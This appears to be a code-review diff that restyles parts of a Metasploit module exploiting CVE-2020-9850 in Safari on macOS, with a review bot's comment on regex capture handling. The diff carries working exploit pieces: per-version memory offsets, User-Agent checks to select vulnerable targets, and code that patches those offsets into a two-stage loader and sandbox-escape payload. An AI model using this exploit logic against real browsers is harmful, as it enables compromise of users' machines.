fix
@@ -414,38 +414,38 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
def offset_table
|
||||
{
|
||||
'placeholder' => {
|
||||
:jsc_confstr_stub => 0x0FF5370041414141,
|
||||
:jsc_llint_entry_call => 0x0FF5370041414142,
|
||||
:libsystem_c_confstr => 0x0FF5370041414143,
|
||||
:libsystem_c_dlopen => 0x0FF5370041414144,
|
||||
:libsystem_c_dlsym => 0x0FF5370041414145,
|
||||
jsc_confstr_stub: 0x0FF5370041414141,
|
||||
jsc_llint_entry_call: 0x0FF5370041414142,
|
||||
libsystem_c_confstr: 0x0FF5370041414143,
|
||||
libsystem_c_dlopen: 0x0FF5370041414144,
|
||||
libsystem_c_dlsym: 0x0FF5370041414145
|
||||
},
|
||||
'10.15.3' => {
|
||||
:jsc_confstr_stub => 0xE7D8B4,
|
||||
:jsc_llint_entry_call => 0x361f13,
|
||||
:libsystem_c_confstr => 0x2644,
|
||||
:libsystem_c_dlopen => 0x80430,
|
||||
:libsystem_c_dlsym => 0x80436,
|
||||
jsc_confstr_stub: 0xE7D8B4,
|
||||
jsc_llint_entry_call: 0x361f13,
|
||||
libsystem_c_confstr: 0x2644,
|
||||
libsystem_c_dlopen: 0x80430,
|
||||
libsystem_c_dlsym: 0x80436
|
||||
},
|
||||
'10.15.4' => {
|
||||
:jsc_confstr_stub => 0xF96446,
|
||||
:jsc_llint_entry_call => 0x380a1d,
|
||||
:libsystem_c_confstr => 0x2be4,
|
||||
:libsystem_c_dlopen => 0x8021e,
|
||||
:libsystem_c_dlsym => 0x80224,
|
||||
jsc_confstr_stub: 0xF96446,
|
||||
jsc_llint_entry_call: 0x380a1d,
|
||||
libsystem_c_confstr: 0x2be4,
|
||||
libsystem_c_dlopen: 0x8021e,
|
||||
libsystem_c_dlsym: 0x80224
|
||||
}
|
||||
}
|
||||
end
|
||||
|
||||
def get_offsets(user_agent)
|
||||
if user_agent =~ /Intel Mac OS X (.*?)\)/
|
||||
osx_version = $1.gsub("_", ".")
|
||||
if user_agent =~ /Version\/(.*?) /
|
||||
if Gem::Version.new($1) > Gem::Version.new('13.1')
|
||||
print_warning "Safari version #{$1} is not vulnerable"
|
||||
osx_version = Regexp.last_match(1).gsub('_', '.')
|
||||
if user_agent =~ %r{Version/(.*?) }
|
||||
if Gem::Version.new(Regexp.last_match(1)) > Gem::Version.new('13.1')
|
||||
print_warning "Safari version #{Regexp.last_match(1)} is not vulnerable"
|
||||
return false
|
||||
else
|
||||
print_good "Safari version #{$1} appears to be vulnerable"
|
||||
print_good "Safari version #{Regexp.last_match(1)} appears to be vulnerable"
|
||||
end
|
||||
end
|
||||
mac_osx_version = Gem::Version.new(osx_version)
|
||||
@@ -459,7 +459,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
print_warning "No offsets for version #{mac_osx_version}"
|
||||
end
|
||||
else
|
||||
print_warning "Unexpected User-Agent"
|
||||
print_warning 'Unexpected User-Agent'
|
||||
end
|
||||
return false
|
||||
end
|
||||
@@ -490,7 +490,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
stage1 = exploit_data 'CVE-2020-9850', 'loader.bin'
|
||||
stage2 = exploit_data 'CVE-2020-9850', 'sbx.bin'
|
||||
|
||||
offset_table['placeholder'].each do |k,v|
|
||||
offset_table['placeholder'].each do |k, v|
|
||||
placeholder_index = stage1.index([v].pack('Q'))
|
||||
stage1[placeholder_index, 8] = [offsets[k]].pack('Q')
|
||||
end
|
||||
|
||||
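Review bot: In get_offsets the three `Regexp.last_match(1)` reads still depend on which `=~` ran most recently, so replacing `$1` keeps the fragile part: the macOS capture has to be copied before the `Version/` match overwrites it. Binding each capture to a local where it is matched, e.g. `safari_version = Regexp.last_match(1)`, would make that ordering explicit and avoid repeating the call in the comparison and both messages. Both captures come from a client-supplied header and `(.*?)` accepts any text, so `Gem::Version.new` can raise ArgumentError on a malformed value; checking `Gem::Version.correct?(safari_version)` first would let the method take its existing `return false` path instead. The body of get_offsets continues outside the first hunk, so the handling of `mac_osx_version` after it is not visible here.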